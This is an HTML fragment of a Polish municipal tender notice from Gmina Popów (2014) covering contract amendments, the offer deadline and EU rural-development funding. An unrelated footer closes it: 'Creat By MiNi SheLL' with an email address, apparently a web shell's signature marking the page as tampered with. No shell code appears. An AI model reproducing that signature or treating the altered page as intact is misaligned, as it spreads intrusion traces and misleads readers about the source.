<p>Na podstawie art. 144 ustawy, Zamawiający zakłada możliwość zmiany umowy w następującym zakresie:
- zmiana terminu wykonania robót  w sytuacjach wyjątkowych, spowodowanych siłą    niezależną od stron umowy, lub z powodu zmiany zakresu robót
- zmiany kolejności wykonywania robót spowodowane warunkami atmosferycznymi lub technologią</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gminapopow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Popów ul. Częstochowska 6 Zawady 42-110 Popów pok. nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.01.2014 godzina 10:00, miejsce: Urząd Gminy Popów ul. Częstochowska 6 Zawady 42-110 Popów pok.12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany w ramach Programu Rozwoju Obszarów Wiejskich woj. Śląskiego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com